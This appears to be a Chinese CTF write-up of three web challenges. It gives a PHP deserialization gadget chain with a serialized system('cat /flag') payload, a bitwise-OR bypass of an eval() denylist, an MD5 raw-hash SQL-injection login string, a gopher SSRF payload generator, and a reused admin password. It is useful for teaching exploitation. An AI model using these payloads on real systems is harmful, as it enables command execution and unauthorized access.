easy_seri

开局源码

第一关

具体代码我忘了，但主要思路是利用“静态方法调用”的字符串形式（Class::method）来动态调用对象的方法

payload

?a=s:13:"Test::getHint;"

然后拿到第二关的源码

<?php
class Fake{
    public $firm;
    public $test;
    // Magic setter: fires whenever something writes to a property that Fake
    // does not declare (firm/test are the only declared ones). In this
    // challenge the writer is Temp::__destruct, so $firm is the property
    // *name* it chose and $test the value it assigned.
    public function __set($firm,$test){
    // The assigned value is replaced by a fixed string, so only the property
    // name reaches the sink below.
    $test = "No,You can't";
    // Sink: the property name is unserialize()d and the result is invoked.
    // A serialized [object, 'method'] array is a valid callable, so whoever
    // controls the name picks the object and method that get called.
    $firm = unserialize($firm);
    call_user_func($firm,$test);
  }
}
class Temp{
    public $pri;
    public $fin=1;
    // Entry point of the chain: runs when the object produced by unserialize()
    // is discarded. `action` is not declared on Temp, so it exists only when
    // the serialized payload supplies it.
    public function __destruct()
    {
        $a=$this->action;
       // Writes property $a on $pri. With $pri = Fake and $a not one of
       // Fake's declared properties, this invokes Fake::__set($a, $this->fin).
       $this->pri->$a = $this->fin;
    }

}

class OwO{
    public $fc;
    public $args;   
    // Final gadget: invokes whatever callable is stored in $fc with $args.
    // Reached via call_user_func([$owo, 'run']) inside Fake::__set; with
    // fc = 'system' (as in the write-up) this is command execution.
    function run()
    {

        return ($this->fc)($this->args);

    }
}
// Request input goes straight into unserialize(): every class in this file
// becomes instantiable from the request, and Temp::__destruct fires as soon
// as the result is discarded. Defensive fix: json_decode() for data, or at
// minimum unserialize($d, ['allowed_classes' => false]) to refuse objects.
$d = $_GET['poc'];
unserialize($d);

可以知道利用链是Temp -> Fake -> OwO

最后的一步执行自定义函数是通过查手册发现的利用方式

意思是 new 一个 OwO 对象并给 fc、args 两个属性赋值，把它和方法名 'run' 组成数组 [$c, 'run'] 后序列化，再把结果赋给 action；Fake::__set 里 unserialize 得到这个数组，call_user_func 就会调用 $c->run()

构造利用方法

<?php
// Stub of the target's Fake class: only the property layout matters for
// serialize(); __set is omitted on purpose so nothing executes locally.
class Fake{
    public $firm;
    public $test;
}
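/**
 * Stub of the target's Temp class (no __destruct, so nothing fires locally).
 *
 * `action` is declared explicitly: the generator assigns it, and writing an
 * undeclared property is deprecated on PHP 8.2+. Declaring it last keeps the
 * serialized property order (pri, fin, action) identical to the dynamic case,
 * so the emitted payload does not change.
 */
class Temp{
    public $pri;
    public $fin=1;
    public $action;
}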

// Stub of the target's OwO class; run() is omitted so the callable is only
// ever serialized here, never invoked.
class OwO{
    public $fc;
    public $args;   
}
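// The two lines copied from the challenge (`$d = $_GET['poc']; unserialize($d);`)
// are dropped: this script only *builds* the payload, and unserializing
// request input in a local generator would re-create the very sink being
// demonstrated (and emits an undefined-index warning when run from the CLI).
$a = new Temp();
$b = new Fake();
$c = new OwO();
// Chain: Temp::__destruct -> writes $action onto $pri (Fake) -> Fake::__set
// unserializes the property name and call_user_func()s it -> OwO::run.
$a->pri = $b;
$c->fc = 'system';
$c->args = 'cat /flag';
// [object, 'method'] is a valid PHP callable once unserialized.
$arr = [$c, 'run'];
$a->action = serialize($arr);
echo serialize($a);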

payload

O:4:"Temp":3:{s:3:"pri";O:4:"Fake":2:{s:4:"firm";N;s:4:"test";N;}s:3:"fin";i:1;s:6:"action";s:87:"a:2:{i:0;O:3:"OwO":2:{s:2:"fc";s:6:"system";s:4:"args";s:9:"cat /flag";}i:1;s:3:"run";}";}

flag

flag{ac1419bcb613a4e40dea12acfb9ba644}

magicchar

<?php
// All warnings/notices are silenced for the request (this also hides eval()
// parse errors and the preg_match() pattern warning inside Magic()).
error_reporting(0);
// Presumably defines $flag, which is echoed on success (file not shown).
include'flag.php';
// Input gate for the eval() below: rejects non-printable bytes, then a
// denylist of regexes. It terminates the request on rejection rather than
// returning, so the caller never sees a verdict.
function Magic($str){

  for($i=0; $i<=strlen($str)-1; $i++) {

    // Byte-wise (strlen/ord): anything outside printable ASCII 32..126.
    if ((ord($str[$i])<32) or (ord($str[$i])>126)) {
      die('sorry');
      exit; // unreachable: die() has already ended the script
    }

  }

  // Denylist: letters except W, whitespace, quotes, backtick, [ ] $ \ ^ ~.
  // Two things worth knowing when reading the bypass below: '""' only
  // matches two *adjacent* double quotes, so a single '"' passes; and '\\'
  // in single quotes is one backslash, giving the pattern "/\/m" with no
  // closing delimiter, so preg_match() returns false (warning hidden by
  // error_reporting(0)) and a lone backslash is not actually rejected.
  // '|' is not listed at all. A denylist is not a safe control for eval().
  $blklst = ['[A-VX-Za-z]',' ','\t','\r','\n','\'','""','`','\[','\]','\$','\\','\^','~'];
  foreach ($blklst as $blkitem) {
    if (preg_match('/' . $blkitem . '/m', $str)) {
      die('out');
      exit;
    }
  }
}
if(!isset($_GET['yell'])) {
  show_source(__FILE__);
} else {
  $str = $_GET['yell'];
  // Magic() die()s on rejection, so reaching the next line means $str passed.
  Magic($str);
  ob_start();
  // Sink: request data is spliced into source text and eval()'d; its output
  // is captured with output buffering rather than returned. The denylist in
  // Magic() is the only control, and the write-up shows it being bypassed.
  // The safe design is to never eval() request data at all.
  $res = eval("echo " . $str . ";");
  $out = ob_get_contents();
  ob_end_clean();
  // Strict comparison of the captured output with the expected string.
  if ($out === "Wa4nn") {
      echo $flag;
  } else {
    echo htmlspecialchars($out, ENT_QUOTES);
  }
}
?>

没有过滤 |，可以用按位或运算来构造 payload

用php来构造出可用的或运算

<?php
// Copied along with the challenge source. Keeping error_reporting(0) also
// hides the preg_match() warning for the malformed '\\' pattern in Magic().
error_reporting(0);
// Leftover from the challenge: flag.php is not needed by this local
// generator, and a missing file only produces a (suppressed) warning.
include'flag.php';
/**
 * Local copy of the challenge's filter, with die() replaced by return values
 * so it can be called repeatedly while enumerating candidate characters.
 *
 * @return string|null 'sorry' for a byte outside printable ASCII, 'out' for a
 *                     denylist hit, null when the input passes.
 */
function Magic($str){
  $length = strlen($str);

  // Byte-wise printable-ASCII check (32..126); the first bad byte decides.
  for ($pos = 0; $pos < $length; $pos++) {
    $code = ord($str[$pos]);
    if ($code < 32 || $code > 126) {
      return 'sorry';
    }
  }

  // Same denylist as the target. '\\' is a lone backslash, so its pattern
  // "/\/m" has no closing delimiter and preg_match() returns false for it.
  $denylist = ['[A-VX-Za-z]',' ','\t','\r','\n','\'','""','`','\[','\]','\$','\\','\^','~'];
  foreach ($denylist as $pattern) {
    if (preg_match('/' . $pattern . '/m', $str) === 1) {
      return 'out';
    }
  }

  return null;
}

// Enumerate printable character pairs that each pass Magic() on their own and
// print, one per line, the bitwise-OR result followed by the two source
// characters.
for ($first = 32; $first < 127; $first++) {
    $str1 = chr($first);
    $verdict = Magic($str1);
    if ($verdict === 'out' || $verdict === 'sorry') {
        continue;
    }
    for ($second = 32; $second < 127; $second++) {
        $str2 = chr($second);
        $verdict = Magic($str2);
        if ($verdict === 'out' || $verdict === 'sorry') {
            continue;
        }
        // Same output as the original `$str1|$str2.$str1.$str2`: '.' binds
        // tighter than '|', and a string OR keeps the longer operand's extra
        // bytes, so that expression already yields (str1|str2) . str1 . str2.
        echo ($str1 | $str2) . $str1 . $str2;
        echo '<br>';
    }
}

输出的每一行依次是：或运算得到的字符、第一个字符、第二个字符

最后手工一个字符一个字符拼接

得到 "W@0@@" | "W!4.." 可以生成 Wa4nn

所以payload

?yell="W@0@@"|"W!4.."

最后flag

flag{2e8650336723cba98e81fce4031b88d2}

really_admin

index.php 尝试注入无果，发现 admin.php 但被 302 重定向。之后各种尝试都无果，一直在等 hint

hint:Do you like MD5?

md5 登录让人想到 md5 和 MySQL 的一个考点：参数做 md5 之后直接放进数据库查询。一共有两个字符串 ffifdyop 和 129581926211651571912466741651878684928，第一个回显 hack，第二个登录成功

payload

?username=1&password=129581926211651571912466741651878684928

登录后的页面是一个可以用 gopher 协议发包的接口，想到之前 CTF 里有一道类似的题目

找到脚本,改一下发现可以直接用

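import binascii
import urllib.parse


def str_to_hexStr(string):
    """Return the hex encoding of ``string`` (UTF-8 bytes) as an ASCII str."""
    str_bin = string.encode('utf-8')
    return binascii.hexlify(str_bin).decode('utf-8')


# Raw HTTP request the SSRF endpoint relays to the local admin.php.
# NOTE(review): line breaks were collapsed in the page copy of this script;
# the blank line separating headers from body is required by HTTP and is
# restored here. The original used bare LF line endings; strict parsers may
# want CRLF -- confirm against the target before relying on it.
body = 'username=admin&password=5fb4e07de914cfc82afb44vbaf402203'
payload = '''POST /admin.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: {}

{}'''.format(len(body), body)
# Content-Length is len(body) directly; the original computed the same value
# as len(payload.split('username')[1]) + 8 and also had a dead
# `payload.format(...)` expression whose result was discarded -- both removed.

hex_payload = str_to_hexStr(payload)
# Percent-encode every byte as '%xx' so gopher:// carries the raw request.
urlencodeData = ''.join(
    '%' + hex_payload[i:i + 2] for i in range(0, len(hex_payload), 2)
)
print('ssrf.php?way=gopher://127.0.0.1:80/_' + urllib.parse.quote(urlencodeData))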

是原题，但由于忘了是哪场比赛，没有找到保存的 pdf。

然后一人继续找、一人继续尝试，发现 rename 被 ban 了，之前 wp 的方法用不了；后来终于找到本地保存的原题 wp：2021 虎符“慢慢做”管理系统

最后发现admin密码没有改,可以直接用之前wp的admin密码

username=admin&password=5fb4e07de914cfc82afb44vbaf402203

登录之后重定向到 flag.php，cookie 为 tin3hia48hn31gmp50h2u96i95

访问后拿到flag

flag{59d1708270cba9c6aff1474285817cf4}